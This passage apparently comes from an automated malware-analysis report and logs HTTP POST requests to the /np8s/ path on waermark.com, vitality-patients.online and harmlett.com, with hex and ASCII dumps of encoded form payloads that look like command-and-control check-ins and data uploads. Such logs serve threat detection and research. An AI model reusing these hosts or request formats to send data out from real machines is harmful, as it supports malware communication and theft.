41 41 48 57 41 35 46 61 4a 75 59 46 31 6a 72 65 68 30 58 4e 4d 79 67 78 4b 31 77 4c 5a 66 42 53 4f 2d 6e 79 5a 76 43 56 6e 37 43 54 6f 58 38 59 78 75 71 33 67 50 63 36 70 75 55 4a 6b 46 45 52 48 53 56 6b 52 70 44 51 4a 68 59 73 66 76 4c 54 61 54 50 75 75 44 36 71 32 62 45 49 32 7a 30 6c 31 6b 56 57 61 39 70 73 72 65 69 61 74 6e 67 59 74 59 33 47 6b 33 4d 34 52 71 30 2d 28 32 47 47 74 79 31 50 69 35 4d 68 51 4f 76 30 6c 4d 57 44 56 6a 50 52 78 61 74 5a 58 34 48 72 57 4a 54 36 69 65 43 75 62 74 49 4c 4f 78 49 36 41 65 53 47 48 70 39 6d 66 49 52 49 7e 46 73 6c 41 75 78 39 57 48 70 63 67 36 41 47 5a 6c 41 42 74 34 39 64 59 57 77 75 39 39 39 4d 28 6f 4f 74 38 47 71 49 6e 42 67 59 30 73 68 78 6e 54 70 4b 35 39 4a 76 39 7a 55 72 6b 64 34 46 6c 61 54 30 5a 4f 62 57 58 57 48 64 5a 68 59 46 57 5a 62 66 4f 59 70 39 38 56 43 74 67 73 38 52 39 5a 7a 4e 4d 64 57 4e 6d 4f 32 34 33 6d 7a 69 50 6c 5a 78 58 67 4e 76 59 32 76 6c 37 6c 6b 79 32 4a 55 35 6b 50 79 4b 4f 41 44 6a 67 71 43 31 49 6d 7a 47 4b 2d 76 75 63 37 56 62 79
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.waermark.comConnection: closeContent-Length: 416Cache-Control: no-cacheOrigin: http://www.waermark.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.waermark.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 68 72 35 36 33 77 7a 61 76 58 56 62 7a 43 70 4e 64 64 43 56 55 72 62 55 71 55 4f 50 4e 78 55 6d 38 4f 62 49 79 55 76 6e 65 68 36 55 32 50 72 35 51 4b 73 62 6b 42 77 6d 41 41 61 32 33 58 53 2d 28 56 6b 53 72 30 34 33 4a 48 6d 6c 4f 79 6b 4c 79 71 48 32 64 71 41 2d 78 44 64 65 78 78 6a 64 51 67 41 48 35 39 56 69 44 6c 69 66 35 64 72 38 7a 66 64 51 4d 41 56 66 41 4b 71 36 64 30 57 6f 55 76 46 6d 35 62 67 79 46 35 34 70 74 50 51 39 4e 4f 28 5f 7a 58 41 32 63 74 44 49 65 53 4b 35 4c 69 42 53 34 7a 62 56 64 52 44 6c 41 34 6d 43 6f 32 43 73 4d 33 74 43 58 64 7a 4b 6a 39 56 4c 61 46 39 51 68 69 74 71 73 74 51 53 49 78 39 54 35 47 4c 65 74 4f 72 52 63 59 6e 65 45 38 72 45 33 57 46 42 67 5a 44 33 67 75 44 44 73 71 30 73 51 67 6c 58 73 2d 68 6c 4d 50 37 6f 7e 41 68 51 65 49 4b 6d 51 35 4a 50 53 41 33 4b 4f 70 6a 61 6e 54 70 4f 73 58 28 32 4f 52 52 56 66 48 79 74 74 46 57 55 7e 49 28 70 6a 69 55 6d 7a 5f 6e 67 6d 39 4c 7a 39 74 48 56 5a 35 53 66 28 67 5a 4a 35 61 4a 30 76 6f 79 56 48 54 4a 68 77 46 70 53 6c 39 42 4d 6d 62 52 66 77 54 41 58 62 49 49 37 39 57 75 35 79 44 74 62 42 6d 72 72 6e 4a 7e 58 7e 54 4e 62 4f 38 77 31 35 43 66 75 45 62 67 53 58 4f 49 2d 38 51 63 31 79 66 6e 54 43 64 56 66 6d 48 4e 45 6f 54 63 2e 00 00 00 00 00 00 00 00 Data Ascii: 
3fk4oN=hr563wzavXVbzCpNddCVUrbUqUOPNxUm8ObIyUvneh6U2Pr5QKsbkBwmAAa23XS-(VkSr043JHmlOykLyqH2dqA-xDdexxjdQgAH59ViDlif5dr8zfdQMAVfAKq6d0WoUvFm5bgyF54ptPQ9NO(_zXA2ctDIeSK5LiBS4zbVdRDlA4mCo2CsM3tCXdzKj9VLaF9QhitqstQSIx9T5GLetOrRcYneE8rE3WFBgZD3guDDsq0sQglXs-hlMP7o~AhQeIKmQ5JPSA3KOpjanTpOsX(2ORRVfHyttFWU~I(pjiUmz_ngm9Lz9tHVZ5Sf(gZJ5aJ0voyVHTJhwFpSl9BMmbRfwTAXbII79Wu5yDtbBmrrnJ~X~TNbO8w15CfuEbgSXOI-8Qc1yfnTCdVfmHNEoTc.
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.waermark.comConnection: closeContent-Length: 36488Cache-Control: no-cacheOrigin: http://www.waermark.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.waermark.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 68 72 35 36 33 31 61 52 79 33 34 46 39 79 31 75 63 50 79 42 42 4c 4c 53 6f 45 61 41 49 78 35 2d 34 36 57 35 76 45 28 61 4d 51 43 4b 79 5f 32 5a 55 4c 30 35 6b 46 34 4c 62 6d 43 71 7a 79 4b 5f 28 56 73 4e 72 30 38 33 4b 48 4f 31 4f 51 63 78 31 49 28 31 63 4b 41 4f 77 44 64 4d 31 30 37 77 51 67 30 31 35 39 74 79 44 57 32 66 35 37 6e 38 33 75 64 74 42 41 56 64 4e 71 61 2d 51 55 71 66 55 72 70 45 35 5a 6b 79 43 4a 38 70 69 50 67 79 47 74 6e 38 36 6e 41 4a 4b 64 43 49 46 69 48 49 4c 69 45 42 34 79 33 56 49 79 33 6c 42 70 4b 43 74 46 61 72 48 6e 74 62 47 4e 7a 39 70 64 70 61 61 46 68 63 68 67 41 58 73 38 6b 53 4a 42 39 57 38 51 4c 57 38 70 66 47 51 34 54 35 45 38 33 68 33 44 64 4a 67 59 76 62 67 64 62 34 6f 49 64 4a 51 69 6f 5a 75 65 68 70 47 76 37 4e 7e 41 68 67 65 49 4c 48 51 36 52 50 53 48 4c 4b 50 49 54 61 77 54 70 52 78 48 28 7a 47 78 51 4c 62 43 71 30 74 46 65 6c 7e 4b 28 58 6a 55 41 6d 79 74 66 67 32 73 4c 77 6f 4e 48 58 57 5a 54 61 75 51 5a 47 35 61 49 52 76 71 62 4b 48 43 5a 68 32 55 70 53 70 37 31 4d 68 72 52 66 36 7a 41 52 56 5a 31 6d 39 57 32 39 79 43 64 6c 42 52 62 72 69 50 71 58 35 79 4e 62 49 4d 77 31 7a 53 65 51 43 4c 4a 45 54 65 4e 66 37 52 77 68 6e 75 54 67 4a 50 45 44 77 46 4e 6b 33 58 76 63 4d 4f 5a 34 34 4b 45 5f 62 4e 71 37 78 54 73 34 6d 6d 36 70 6f 41 43 79 56 36 7e 6e 54 56 62 47 35 5a 66 4c 44 5a 36 31 67 63 38 71 5a 51 6e 36 33 72 54 4b 43 49 31 32 67 62 46 61 64 61 33 53 72 64 71 45 54 79 42 49 6b 4d 6f 64 4b 32 6a 73 6d 75 45 4d 79 4a 49 78 5a 63 58 43 57 6f 70 35 78 70 33 4e 6f 62 73 2d 4b 37 43 34 4f 6b 
31 50 62 63 58 2d 64 7a 65 70 52 33 6c 53 72 52 57 4c 71 72 4e 2d 77 4d 42 38 45 59 72 63 5a 63 44 55 34 6d 35 73 62 54 73 48 72 42 57 34 53 38 44 6b 43 38 53 62 43 30 44 75 4e 7a 67 43 4d 64 54 78 6c 42 48 47 77 75 51 6c 6a 50 34 6c 76 76 6e 48 6b 55 53 4f 6d 59 65 75 61 6d 6a 49 66 32 66 4a 47 79 56 57 79 41 6e 59 66 47 4c 46 4e 74 30 76 49 33 6c 50 4e 35 44 67 57 6c 74 76 53 4e 49 47 61 46 72 6d 64 46 30 70 55 62 52 68 31 4e 45 7a 67 47 34 66 48 75 42 4b 6f 5a 28 79 4b 61 73 66 4d 46 68 77 4d 78 78 44 67 6e 42 69 46 4c 74 70 39 38 6f 6a 70 37 46 32 51 54 59 73 56 64 6c 48 6b 6f 6c 44 66 4b 32 74 63 54 31 58 4c 79 4e 4e 59 59 4c 64 32 78 6f 70 6c 61 57 72 34 6d 48 72 47 30 56 45 55 51 74 44 49 69 42 7a 50 30 6a 4c 4c 39 73 4b 58 4e 31 62 44 39 76 64 54 71 77 53 70 38 51 7a 4e 57 48 59 4c 6f 42 52 72 4f 70 79 75 36 57 4e 71 41 30 77 4c 5a 41 31 52 71 7a 38 6b 79 4a 39 7a 53 72 33 79 48 30 77 30 74 30 54 38 71 37 38 59 62 46 4b 43 7a 62 49 4d 59 38 37 43 6d 38 43 4a 62 5a 43 59 63 35 45 47 45 74 6d 67 4b 59
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.vitality-patients.onlineConnection: closeContent-Length: 416Cache-Control: no-cacheOrigin: http://www.vitality-patients.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.vitality-patients.online/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 65 50 6a 41 5a 74 35 61 58 43 5a 61 6b 4b 51 6b 70 71 44 4e 76 39 61 41 47 51 5a 50 4b 64 71 38 52 53 78 34 56 52 55 46 62 48 46 49 6a 31 76 34 66 77 64 59 31 78 47 67 45 76 6a 5f 37 78 54 48 45 6b 57 62 59 4d 6a 49 50 7a 57 37 74 66 78 73 61 50 6c 6a 38 65 47 31 66 45 41 50 53 66 7a 67 43 61 5a 76 64 6c 6a 77 35 45 68 70 61 4b 46 30 34 6b 6a 57 62 71 6d 53 63 49 54 6b 28 69 69 37 28 4a 77 6b 6d 48 78 61 41 46 69 37 53 57 48 70 62 79 53 39 34 79 70 61 49 58 4d 77 65 6d 45 6c 71 72 33 71 52 6b 6f 72 51 4d 55 47 49 58 61 6e 59 66 4e 46 4f 64 32 57 43 5a 46 52 38 5a 6d 33 58 71 54 30 36 4e 66 48 7e 34 4e 45 79 50 34 37 46 45 4a 68 56 71 62 47 78 6a 4a 72 6c 6b 43 32 6b 53 5a 46 49 33 49 34 56 35 6e 49 39 78 64 52 33 49 73 77 41 73 64 57 79 72 39 67 65 4f 5a 6f 73 53 64 65 32 6d 57 67 6c 42 44 6b 41 6d 4f 31 67 4b 6e 6a 30 33 32 2d 79 48 56 78 30 70 47 37 7a 37 68 4d 46 77 7e 54 41 74 77 33 56 55 31 66 7a 67 4a 78 67 43 37 65 6e 35 56 63 63 53 7a 36 52 63 55 6c 36 47 4b 43 6f 61 7a 5f 47 78 4e 4d 34 6a 64 70 72 44 7e 31 75 71 56 71 61 7a 5a 44 34 41 42 69 50 37 72 4d 54 55 4b 30 7e 4e 54 34 62 67 68 66 53 2d 58 35 68 53 51 6f 35 4e 44 69 69 44 66 35 63 4f 31 38 46 4e 55 4b 43 68 34 6b 28 58 4c 64 48 5a 49 2e 00 00 00 00 00 00 00 00 Data Ascii: 
3fk4oN=ePjAZt5aXCZakKQkpqDNv9aAGQZPKdq8RSx4VRUFbHFIj1v4fwdY1xGgEvj_7xTHEkWbYMjIPzW7tfxsaPlj8eG1fEAPSfzgCaZvdljw5EhpaKF04kjWbqmScITk(ii7(JwkmHxaAFi7SWHpbyS94ypaIXMwemElqr3qRkorQMUGIXanYfNFOd2WCZFR8Zm3XqT06NfH~4NEyP47FEJhVqbGxjJrlkC2kSZFI3I4V5nI9xdR3IswAsdWyr9geOZosSde2mWglBDkAmO1gKnj032-yHVx0pG7z7hMFw~TAtw3VU1fzgJxgC7en5VccSz6RcUl6GKCoaz_GxNM4jdprD~1uqVqazZD4ABiP7rMTUK0~NT4bghfS-X5hSQo5NDiiDf5cO18FNUKCh4k(XLdHZI.
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.vitality-patients.onlineConnection: closeContent-Length: 36488Cache-Control: no-cacheOrigin: http://www.vitality-patients.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.vitality-patients.online/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 65 50 6a 41 5a 73 46 51 61 54 68 44 7e 4b 63 58 6b 34 43 4d 38 4d 71 47 45 67 64 55 4a 66 75 6a 47 77 49 66 4b 44 4e 7a 61 48 4e 53 77 31 7a 5a 62 7a 73 46 31 7a 75 46 4e 35 7a 37 28 52 66 59 45 67 79 31 59 4d 6e 49 4f 33 54 6d 74 38 5a 4b 61 71 4a 67 78 65 47 4a 65 45 41 73 57 65 28 42 43 62 74 33 64 6c 72 67 7e 30 64 70 62 6f 4e 30 36 6d 4c 42 56 71 6d 49 66 4c 37 43 79 43 75 63 28 4a 35 6a 6d 47 4e 61 41 31 65 37 53 32 58 6d 5a 78 36 2d 31 43 70 6c 4e 58 4e 30 56 47 49 62 71 72 7a 55 52 6d 38 72 51 2d 67 47 4a 45 69 6e 4a 2d 4e 45 46 4e 33 63 47 5a 46 6d 34 5a 37 70 58 75 4c 34 36 4d 62 39 7e 4e 39 45 7a 5f 34 2d 42 58 35 44 52 39 37 64 7a 6a 56 63 6c 6b 66 39 6b 44 45 59 49 32 31 74 44 37 28 6a 68 6e 78 5f 33 4e 31 58 43 4d 64 4e 71 37 39 37 65 4f 5a 59 73 53 64 38 32 6d 6d 67 6c 47 58 6b 42 45 57 31 78 61 6e 73 32 58 32 5f 71 33 56 69 77 6f 37 47 7a 36 4a 63 46 30 75 31 41 64 6b 33 58 47 39 66 69 31 39 79 6f 79 37 63 74 5a 56 47 50 43 7a 4c 52 63 56 49 36 48 4b 73 6f 4a 58 5f 48 67 4e 4d 36 77 31 70 74 7a 7e 31 74 71 56 6f 44 44 56 70 34 41 5a 39 50 5f 6d 37 54 6e 47 30 28 63 7a 34 63 43 4a 66 51 4f 58 35 6f 79 52 6c 7e 76 50 70 70 79 7e 45 4c 2d 5a 4e 61 49 41 4b 4f 7a 45 70 69 6c 6e 68 62 2d 39 4a 66 69 72 65 70 57 28 47 49 48 6a 2d 7a 6f 53 2d 4a 59 61 31 75 33 4f 64 4e 35 72 34 46 51 69 63 48 6f 35 69 77 42 65 6b 4b 52 77 7a 34 59 4f 4a 57 77 45 4a 70 65 4c 46 55 58 6c 61 69 32 62 67 73 35 44 6a 72 61 37 64 36 48 38 69 65 69 47 54 37 46 44 56 32 42 76 48 6b 34 33 36 51 32 36 57 33 4c 
35 75 71 4c 58 30 58 79 76 4e 73 4a 7e 49 58 43 74 68 32 33 39 6b 30 58 49 50 79 6b 35 44 52 45 65 4c 76 5f 53 66 78 39 69 75 30 4f 72 65 75 50 58 2d 54 52 4d 51 50 32 43 75 78 53 5a 37 38 33 6f 7a 6b 45 6e 59 35 67 6a 4f 54 37 30 42 79 64 38 6c 30 6b 67 48 75 5f 78 77 54 56 6e 6d 55 35 38 52 77 6b 4b 6f 4f 59 6d 46 43 70 51 7a 4c 72 6b 6f 67 48 55 6e 58 70 78 51 34 33 66 38 78 73 4c 5f 33 55 75 52 6b 49 32 49 67 43 43 34 7a 5f 7e 49 45 31 70 4f 4d 68 6d 31 57 32 62 77 49 65 28 75 4a 31 67 77 72 79 7a 6f 6d 6d 32 47 75 6d 39 37 34 76 52 65 45 64 31 51 73 73 51 48 72 44 59 35 76 34 6b 4b 55 67 39 41 67 45 55 72 76 44 43 39 74 51 34 4f 4f 69 48 32 30 2d 55 4f 28 36 50 77 5a 5a 63 42 6c 41 6e 55 28 77 4e 79 45 47 79 66 4f 47 31 6c 4a 47 62 4e 34 58 50 34 71 46 63 7a 52 48 4a 4c 30 4f 4d 68 74 33 6b 4a 6d 70 50 42 46 4e 4e 79 31 4e 72 63 76 57 65 30 47 4f 72 64 6d 31 6c 72 76 50 72 46 46 4c 48 67 47 63 68 53 53 32 4a 4f 6b 66 41 2d 6d 42 30 31 50 79 57 64 72 4b 6f 50 32 33 6f 4f 37 2d 53 42 50 4f 78 52 50 57 45
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.harmlett.comConnection: closeContent-Length: 416Cache-Control: no-cacheOrigin: http://www.harmlett.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.harmlett.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 49 64 53 47 7a 46 72 78 34 73 63 44 6b 31 73 59 6a 6b 28 59 69 47 49 42 77 4a 32 43 77 6a 78 49 61 65 51 73 58 45 31 56 79 30 76 34 58 73 4f 55 35 46 55 55 36 4e 6b 75 35 57 4c 78 38 4d 39 67 62 62 42 58 54 2d 7e 32 67 47 58 35 69 42 48 55 41 68 52 55 75 6f 43 52 47 54 52 6d 6c 32 38 46 61 4c 6b 64 67 6c 32 41 6e 4e 57 31 49 64 35 65 6d 53 51 4f 34 5a 6b 6d 4a 74 50 56 38 71 52 62 6f 6f 36 4b 45 62 38 32 76 58 38 52 43 4a 37 6e 5a 39 64 72 64 6a 52 38 54 47 74 4a 4b 73 57 30 34 62 4c 7a 30 78 61 56 4e 45 6a 5a 37 36 56 51 62 5f 71 6a 51 69 32 31 35 7a 54 66 28 35 5a 77 56 4b 4e 44 79 69 62 7a 4e 4b 54 63 44 33 58 6f 35 6a 46 58 34 74 65 41 7a 31 54 6b 37 7a 64 56 30 74 6c 4b 71 38 71 52 58 32 69 72 28 65 79 76 38 45 50 49 4f 42 42 63 41 4e 54 65 43 52 73 63 66 66 55 66 64 5f 37 49 78 76 75 54 56 30 72 34 64 57 7a 78 4d 50 75 68 55 6f 36 44 67 4f 53 61 77 38 78 7a 64 5f 71 41 67 6c 38 77 5a 48 43 67 41 50 38 62 6d 72 65 5a 48 70 5a 72 76 72 6f 73 71 52 58 50 7e 49 52 57 63 56 73 54 42 36 4d 79 6d 33 61 58 64 78 45 50 5a 61 76 59 73 5a 31 61 74 64 32 64 6b 35 55 6e 39 36 49 72 69 54 74 35 5a 51 30 64 67 65 48 54 38 37 7e 5f 55 44 67 45 4a 36 43 73 75 6a 74 2d 70 42 35 57 44 7a 58 56 41 4e 6b 64 4e 51 38 2e 00 00 00 00 00 00 00 00 Data Ascii: 
3fk4oN=IdSGzFrx4scDk1sYjk(YiGIBwJ2CwjxIaeQsXE1Vy0v4XsOU5FUU6Nku5WLx8M9gbbBXT-~2gGX5iBHUAhRUuoCRGTRml28FaLkdgl2AnNW1Id5emSQO4ZkmJtPV8qRboo6KEb82vX8RCJ7nZ9drdjR8TGtJKsW04bLz0xaVNEjZ76VQb_qjQi215zTf(5ZwVKNDyibzNKTcD3Xo5jFX4teAz1Tk7zdV0tlKq8qRX2ir(eyv8EPIOBBcANTeCRscffUfd_7IxvuTV0r4dWzxMPuhUo6DgOSaw8xzd_qAgl8wZHCgAP8bmreZHpZrvrosqRXP~IRWcVsTB6Mym3aXdxEPZavYsZ1atd2dk5Un96IriTt5ZQ0dgeHT87~_UDgEJ6Csujt-pB5WDzXVANkdNQ8.
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.harmlett.comConnection: closeContent-Length: 36488Cache-Control: no-cacheOrigin: http://www.harmlett.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.harmlett.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 49 64 53 47 7a 46 6e 5a 31 34 74 56 71 46 68 32 69 78 7a 4d 74 53 4d 50 33 35 79 47 28 43 77 51 4e 50 42 58 61 68 4a 42 7a 77 72 2d 54 66 37 62 39 45 63 4d 36 50 38 44 30 46 75 35 35 73 78 68 62 62 49 45 54 5f 4b 32 68 46 57 6d 69 6a 28 79 41 44 35 58 71 49 44 6f 55 44 52 5f 76 69 38 6f 61 4b 51 72 67 6c 7e 51 6d 39 36 31 4a 2d 42 65 76 31 38 48 6e 70 6b 38 53 74 66 4a 79 4b 73 4c 6f 6f 7a 50 45 5a 34 32 75 6e 77 52 54 63 7a 6d 62 36 68 73 55 54 52 35 57 47 73 4a 41 4d 4b 6e 34 62 4f 6d 30 7a 65 56 4f 32 48 5a 34 4f 5a 51 4f 2d 71 67 45 43 32 77 6f 6a 53 64 37 34 6c 68 56 4c 6c 78 79 6a 66 5a 4e 5a 7a 63 44 48 58 70 38 77 6c 31 70 75 48 41 67 6c 4f 30 37 7a 52 38 7a 38 35 43 71 39 48 30 66 67 6e 66 36 38 61 46 38 48 69 64 43 42 41 56 49 74 53 61 43 52 73 57 66 66 55 31 64 5f 4c 49 78 73 7e 54 58 57 7a 34 62 6d 7a 79 44 50 76 72 66 49 36 41 33 2d 65 71 77 39 56 6a 64 2d 7e 71 68 58 4d 77 4c 69 65 67 52 2d 38 55 73 62 65 6c 4c 4a 5a 50 72 72 6f 6a 71 52 57 73 7e 4d 46 47 62 6b 38 54 41 76 67 79 71 31 43 58 62 42 45 50 63 61 76 57 69 35 35 77 74 64 76 56 6b 38 78 61 36 4d 45 72 69 41 6c 35 59 78 30 64 67 75 48 54 36 37 28 53 43 44 41 4a 53 70 62 72 6c 53 74 6d 31 44 42 65 44 54 53 63 55 65 67 35 54 33 35 2d 4e 4a 48 51 41 7a 39 58 68 32 53 43 4f 68 59 73 45 48 6d 5f 71 4a 6b 59 7e 38 43 57 79 66 31 48 42 61 5a 30 4c 61 4e 45 66 55 32 4f 28 44 28 74 54 47 34 34 63 68 7a 35 68 74 33 51 7a 51 61 6f 6a 36 62 59 74 4c 52 66 66 31 77 2d 39 44 6f 50 58 49 7a 73 53 5a 4d 78 70 63 33 58 43 4e 75 44 49 30 50 49 51 4b 68 43 49 33 63 5a 4e 43 
7a 62 72 31 51 77 79 47 6e 31 57 61 4d 78 75 5f 69 59 55 4f 59 50 73 53 74 4c 72 30 4d 77 7e 38 28 41 4b 71 46 67 71 48 4a 4e 52 73 46 6a 54 39 5a 46 31 38 4d 33 30 67 39 2d 39 4b 69 79 65 6c 6b 54 7e 66 65 74 76 63 61 75 7a 53 6d 4c 43 55 57 41 37 6f 72 44 63 41 7e 43 6d 4f 4d 49 6d 38 35 63 7a 30 61 37 33 53 47 50 58 5f 48 66 39 46 6f 63 50 2d 59 6b 72 61 28 71 35 77 4c 59 78 54 6f 78 70 6e 75 45 4e 76 48 72 42 58 4d 62 4e 73 56 67 57 6e 7a 35 4a 63 53 65 38 45 47 6c 38 4f 31 39 6b 6e 49 35 72 54 34 66 37 39 56 6e 72 69 31 55 4b 5a 33 52 41 64 4c 5a 4c 5a 63 2d 7a 6f 73 56 6c 47 6b 53 53 54 34 47 61 37 46 59 6d 59 52 59 42 73 53 6d 49 42 63 53 72 71 46 53 78 4c 4b 5a 63 63 28 34 6f 38 33 6e 70 56 50 6d 76 54 43 4e 47 6d 69 56 64 39 38 68 75 4a 36 52 4a 74 37 4e 46 31 46 70 4a 48 71 73 41 63 71 73 39 41 44 6f 4a 31 61 52 49 79 53 33 56 42 58 43 64 6e 67 7a 35 43 56 61 4a 63 4c 55 77 4a 68 6c 57 63 38 38 56 53 41 39 34 75 33 78 75 79 50 67 64 52 46 69 73 42 63 6f 59 44 79 79 67 79 49 53 43 36 59 34 70 77 69
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.waermark.comConnection: closeContent-Length: 416Cache-Control: no-cacheOrigin: http://www.waermark.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.waermark.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 68 72 35 36 33 77 7a 61 76 58 56 62 7a 43 70 4e 64 64 43 56 55 72 62 55 71 55 4f 50 4e 78 55 6d 38 4f 62 49 79 55 76 6e 65 68 36 55 32 50 72 35 51 4b 73 62 6b 42 77 6d 41 41 61 32 33 58 53 2d 28 56 6b 53 72 30 34 33 4a 48 6d 6c 4f 79 6b 4c 79 71 48 32 64 71 41 2d 78 44 64 65 78 78 6a 64 51 67 41 48 35 39 56 69 44 6c 69 66 35 64 72 38 7a 66 64 51 4d 41 56 66 41 4b 71 36 64 30 57 6f 55 76 46 6d 35 62 67 79 46 35 34 70 74 50 51 39 4e 4f 28 5f 7a 58 41 32 63 74 44 49 65 53 4b 35 4c 69 42 53 34 7a 62 56 64 52 44 6c 41 34 6d 43 6f 32 43 73 4d 33 74 43 58 64 7a 4b 6a 39 56 4c 61 46 39 51 68 69 74 71 73 74 51 53 49 78 39 54 35 47 4c 65 74 4f 72 52 63 59 6e 65 45 38 72 45 33 57 46 42 67 5a 44 33 67 75 44 44 73 71 30 73 51 67 6c 58 73 2d 68 6c 4d 50 37 6f 7e 41 68 51 65 49 4b 6d 51 35 4a 50 53 41 33 4b 4f 70 6a 61 6e 54 70 4f 73 58 28 32 4f 52 52 56 66 48 79 74 74 46 57 55 7e 49 28 70 6a 69 55 6d 7a 5f 6e 67 6d 39 4c 7a 39 74 48 56 5a 35 53 66 28 67 5a 4a 35 61 4a 30 76 6f 79 56 48 54 4a 68 77 46 70 53 6c 39 42 4d 6d 62 52 66 77 54 41 58 62 49 49 37 39 57 75 35 79 44 74 62 42 6d 72 72 6e 4a 7e 58 7e 54 4e 62 4f 38 77 31 35 43 66 75 45 62 67 53 58 4f 49 2d 38 51 63 31 79 66 6e 54 43 64 56 66 6d 48 4e 45 6f 54 63 2e 00 00 00 00 00 00 00 00 Data Ascii: 
3fk4oN=hr563wzavXVbzCpNddCVUrbUqUOPNxUm8ObIyUvneh6U2Pr5QKsbkBwmAAa23XS-(VkSr043JHmlOykLyqH2dqA-xDdexxjdQgAH59ViDlif5dr8zfdQMAVfAKq6d0WoUvFm5bgyF54ptPQ9NO(_zXA2ctDIeSK5LiBS4zbVdRDlA4mCo2CsM3tCXdzKj9VLaF9QhitqstQSIx9T5GLetOrRcYneE8rE3WFBgZD3guDDsq0sQglXs-hlMP7o~AhQeIKmQ5JPSA3KOpjanTpOsX(2ORRVfHyttFWU~I(pjiUmz_ngm9Lz9tHVZ5Sf(gZJ5aJ0voyVHTJhwFpSl9BMmbRfwTAXbII79Wu5yDtbBmrrnJ~X~TNbO8w15CfuEbgSXOI-8Qc1yfnTCdVfmHNEoTc.
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.waermark.comConnection: closeContent-Length: 36488Cache-Control: no-cacheOrigin: http://www.waermark.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.waermark.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 68 72 35 36 33 31 61 52 79 33 34 46 39 79 31 75 63 50 79 42 42 4c 4c 53 6f 45 61 41 49 78 35 2d 34 36 57 35 76 45 28 61 4d 51 43 4b 79 5f 32 5a 55 4c 30 35 6b 46 34 4c 62 6d 43 71 7a 79 4b 5f 28 56 73 4e 72 30 38 33 4b 48 4f 31 4f 51 63 78 31 49 28 31 63 4b 41 4f 77 44 64 4d 31 30 37 77 51 67 30 31 35 39 74 79 44 57 32 66 35 37 6e 38 33 75 64 74 42 41 56 64 4e 71 61 2d 51 55 71 66 55 72 70 45 35 5a 6b 79 43 4a 38 70 69 50 67 79 47 74 6e 38 36 6e 41 4a 4b 64 43 49 46 69 48 49 4c 69 45 42 34 79 33 56 49 79 33 6c 42 70 4b 43 74 46 61 72 48 6e 74 62 47 4e 7a 39 70 64 70 61 61 46 68 63 68 67 41 58 73 38 6b 53 4a 42 39 57 38 51 4c 57 38 70 66 47 51 34 54 35 45 38 33 68 33 44 64 4a 67 59 76 62 67 64 62 34 6f 49 64 4a 51 69 6f 5a 75 65 68 70 47 76 37 4e 7e 41 68 67 65 49 4c 48 51 36 52 50 53 48 4c 4b 50 49 54 61 77 54 70 52 78 48 28 7a 47 78 51 4c 62 43 71 30 74 46 65 6c 7e 4b 28 58 6a 55 41 6d 79 74 66 67 32 73 4c 77 6f 4e 48 58 57 5a 54 61 75 51 5a 47 35 61 49 52 76 71 62 4b 48 43 5a 68 32 55 70 53 70 37 31 4d 68 72 52 66 36 7a 41 52 56 5a 31 6d 39 57 32 39 79 43 64 6c 42 52 62 72 69 50 71 58 35 79 4e 62 49 4d 77 31 7a 53 65 51 43 4c 4a 45 54 65 4e 66 37 52 77 68 6e 75 54 67 4a 50 45 44 77 46 4e 6b 33 58 76 63 4d 4f 5a 34 34 4b 45 5f 62 4e 71 37 78 54 73 34 6d 6d 36 70 6f 41 43 79 56 36 7e 6e 54 56 62 47 35 5a 66 4c 44 5a 36 31 67 63 38 71 5a 51 6e 36 33 72 54 4b 43 49 31 32 67 62 46 61 64 61 33 53 72 64 71 45 54 79 42 49 6b 4d 6f 64 4b 32 6a 73 6d 75 45 4d 79 4a 49 78 5a 63 58 43 57 6f 70 35 78 70 33 4e 6f 62 73 2d 4b 37 43 34 4f 6b 
